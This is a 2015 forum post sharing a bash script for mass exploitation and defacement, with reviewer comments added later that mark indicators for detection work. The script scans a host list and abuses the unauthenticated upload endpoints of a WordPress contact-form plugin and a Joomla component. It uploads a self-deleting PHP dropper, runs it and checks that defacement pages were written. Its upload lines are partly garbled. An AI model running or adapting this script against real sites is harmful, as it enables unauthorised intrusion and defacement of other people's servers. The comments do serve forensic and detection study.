05-19-2015, 04:27 AM
(05-18-2015, 11:56 PM)flips Wrote: wihh makasih om shareannya
kalo boleh tau ini cara kerja exploitnya gmn ya ? oiya itu kan write cssnya kalo misalkan mau write file yang php gimana mas ?
coba yang ini om Contact Form
Code:
#!/bin/bash
#
# NOTE(review): this is a mass-exploitation / defacement script as posted on a
# forum in 2015. It reads a list of hosts, probes each one for an unauthenticated
# file-upload endpoint of the WordPress "sexy-contact-form" plugin or the Joomla
# "com_creativecontactform" component, uploads a self-deleting PHP dropper
# (rr.php) and then checks whether the dropper wrote a defacement page
# (nyet.htm). The code is kept byte-identical below for detection engineering
# and incident-response reference; the comments call out the observable
# indicators. Do not run this against systems you are not authorised to test.
#
# Prompt for the path of the target list. $list is never quoted, so a path
# containing whitespace will break the test and the later `cat $list`.
read -p "List Target = " list
if [ ! -f $list ];then
echo " + List target tdk ada cuk.. "   # (Indonesian) "target list does not exist"
exit
fi
# Per-run prefix for temporary file names under ./tmp. This is $RANDOM, not
# mktemp: the names are predictable and live in the current working directory.
FCK=$RANDOM
# tmp/ receives every curl response; log/ is created but, as far as this
# listing shows, never written to.
if [ ! -d tmp ];then
mkdir tmp
fi
if [ ! -d log ];then
mkdir log
fi
# Write the PHP dropper once (skipped when rr.php already exists in the cwd).
# When the uploaded copy is executed on a victim it: writes the same HTML
# defacement page ("Creed" title/body) to DOCUMENT_ROOT/nyet.htm,
# DOCUMENT_ROOT/images/nyet.htm and DOCUMENT_ROOT/wp-content/nyet.htm; echoes
# md5("creed") as a success marker that CekDFC5 greps for; then unlink()s
# itself. Forensic note: because of the self-unlink the rr.php file usually
# does not survive on the victim — the nyet.htm files and the web-server log
# entries for the upload POST and the follow-up GET of rr.php do.
# The backslashed \$ keep the PHP variables literal inside the unquoted here-doc.
if [ ! -f rr.php ];then
cat > rr.php <<_EOF
<?php \$file="<title>Creed</title><center><div id=q>Creed<br><font size=2>Creed <style>body{overflow:hidden;background-color:black}#q{font:40px impact;color:white;position:absolute;left:0;right:0;top:43%}"; \$path = \$_SERVER["DOCUMENT_ROOT"]; \$r=fopen(\$path."/nyet.htm", "w");fwrite(\$r,\$file);fclose(\$r);\$r=fopen(\$path."/images/nyet.htm", "w");fwrite(\$r,\$file);fclose(\$r);\$r=fopen(\$path."/wp-content/nyet.htm", "w");fwrite(\$r,\$file);fclose(\$r);echo md5("creed");unlink(__FILE__); ?>
_EOF
fi
#######################################
# Check whether a defacement page is reachable.
# Globals:   FCK (read) — temp-file prefix
# Arguments: $1 - URL to fetch
#            $2 - "zone" flag; when 1, the URL is recorded and the caller's
#                 loop is broken out of
# Outputs:   " + File found <url>" on stdout when the body contains "Creed"
#            (case-insensitive); writes the URL to tmp/${FCK}empes.txt when $2 is 1
# Indicators: GET of /nyet.htm style paths with the MSIE 9 / Trident/5.0
#            User-Agent string below
#######################################
CekDFC(){
czone=${2}
# Remove leftovers from a previous call so a stale hit is not re-reported.
if [ -f tmp/${FCK}gck.txt ];then
rm -f tmp/${FCK}gck.txt
fi
if [ -f tmp/${FCK}hasil.txt ];then
rm -f tmp/${FCK}hasil.txt
fi
curl --silent --max-time 10 --connect-timeout 10 -A "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)" "${1}" -o tmp/${FCK}gck.txt
# curl only creates the output file when it received something, so a missing
# file means the fetch failed or timed out.
if [ -f tmp/${FCK}gck.txt ];then
cat tmp/${FCK}gck.txt | grep -i "Creed" >/dev/null;gck=$?
if [ $gck -eq 0 ];then
echo " + File found $1"
if [ $czone -eq 1 ];then
echo "${1}" > tmp/${FCK}empes.txt
# NOTE(review): `break` inside a function, outside any loop in the function,
# is relied on to leave the caller's `for HOSTX` loop. Whether it does is
# bash-version dependent (newer bash no longer propagates break/continue out
# of a function unless compatibility mode is set); in the non-propagating
# case it is a no-op with a warning — confirm on the interpreter in use.
break
fi
fi
fi
}
#######################################
# Trigger the uploaded dropper and verify it ran.
# Globals:   FCK (read), HOSTX (read)
# Arguments: $1 - URL of the uploaded rr.php; fetching it executes the dropper
#                 on the target
# Outputs:   " + Exploit Success" when the response contains the hex string
#            below (the script treats it as the md5("creed") the dropper echoes;
#            not independently verified here), then probes three nyet.htm URLs.
# Note:      the dropper writes nyet.htm to /, /images and /wp-content, but the
#            third probe here checks /components/nyet.htm, which the dropper
#            never creates — that check can only ever miss.
#######################################
CekDFC5(){
#echo " - check file $1"
curl --silent --max-time 10 --connect-timeout 10 "${1}" -o tmp/${FCK}w00t
cat tmp/${FCK}w00t | grep -i "38db7ce1861ee11b6a231c764662b68a" >/dev/null;cwot=$?
if [ $cwot -eq 0 ];then
echo " + Exploit Success"
# Each call passes zone=1, so the first reachable page ends the host loop
# (subject to the bash `break` caveat described in CekDFC).
CekDFC "http://${HOSTX}/nyet.htm" 1
CekDFC "http://${HOSTX}/wp-content/nyet.htm" 1
CekDFC "http://${HOSTX}/components/nyet.htm" 1
fi
}
#######################################
# WordPress path: upload rr.php through the sexy-contact-form plugin's
# bundled file-upload handler, then execute it.
# Globals:   FCK (read), HOSTX (read)
# Indicators (for WAF/log detection):
#   - multipart POST to
#     /wp-content/plugins/sexy-contact-form/includes/fileupload/index.php
#     with a Firefox 3.0.16 (de-LI) User-Agent string
#   - immediately followed by a GET of
#     /wp-content/plugins/sexy-contact-form/includes/fileupload/files/rr.php
# Note: the -F form-field line below looks garbled by the forum's
# e-mail obfuscation; given the follow-up GET of files/rr.php it was
# presumably a files[] field uploading rr.php — the original text is
# not recoverable from this listing.
#######################################
SexyWP(){
curl --silent --max-time 10 --connect-timeout 10 -o tmp/${FCK}resp.txt \
-A "Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729)" \
-F "files[][email protected]" \
--request POST "http://${HOSTX}/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php"
# The upload response is saved but never inspected; success is judged solely
# by executing the dropper.
CekDFC5 "http://${HOSTX}/wp-content/plugins/sexy-contact-form/includes/fileupload/files/rr.php"
}
#######################################
# Joomla path: same upload-then-execute sequence as SexyWP, against the
# com_creativecontactform component's file-upload handler.
# Globals:   FCK (read), HOSTX (read)
# Indicators (for WAF/log detection):
#   - multipart POST to /components/com_creativecontactform/fileupload/index.php
#     with the same Firefox 3.0.16 (de-LI) User-Agent string as SexyWP
#   - immediately followed by a GET of
#     /components/com_creativecontactform/fileupload/files/rr.php
# Note: the -F line is garbled in the listing (see SexyWP).
#######################################
SexyJM(){
curl --silent --max-time 10 --connect-timeout 10 -o tmp/${FCK}resp.txt \
-A "Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729)" \
-F "files[][email protected]" \
--request POST "http://${HOSTX}/components/com_creativecontactform/fileupload/index.php"
CekDFC5 "http://${HOSTX}/components/com_creativecontactform/fileupload/files/rr.php"
}
#######################################
# Pick the WordPress or Joomla attack path for the current host.
# Globals:   FCK (read), HOSTX (read)
# Behaviour: fetches http://HOSTX/index.php; if no response file was produced
#            the host's temp files are removed and the host is skipped.
#            Otherwise any body containing "wp-content" is treated as WordPress
#            and EVERYTHING ELSE as Joomla — there is no actual Joomla detection,
#            nor any check that the vulnerable plugin/component is installed.
#######################################
VulnSexy(){
curl --silent --max-time 10 --connect-timeout 10 "http://${HOSTX}/index.php" -o tmp/${FCK}cvuln
if [ ! -f tmp/${FCK}cvuln ];then
rm -f tmp/${FCK}*
# NOTE(review): `continue` here is meant to skip to the next host in the
# caller's `for HOSTX` loop. As with `break` in CekDFC, propagation out of a
# function is bash-version dependent; on an interpreter that does not
# propagate it, the function simply falls through to the grep below against a
# file that no longer exists.
continue
fi
cat tmp/${FCK}cvuln | grep "wp-content" >/dev/null;csexy=$?
if [ $csexy -eq 0 ];then
echo " + Wordpress Detect"
SexyWP
else
echo " + Joomla Detect"
SexyJM
fi
}
# Main loop: iterate the target list and attack each host in turn.
# `cat $list` is unquoted and word-split, so one host per whitespace-separated
# token; HOSTX is a global read by every function above and is embedded
# unescaped into "http://${HOSTX}/..." URLs. Temp files in tmp/ are not
# cleaned up after a successful run.
for HOSTX in `cat $list`
do
VulnSexy
done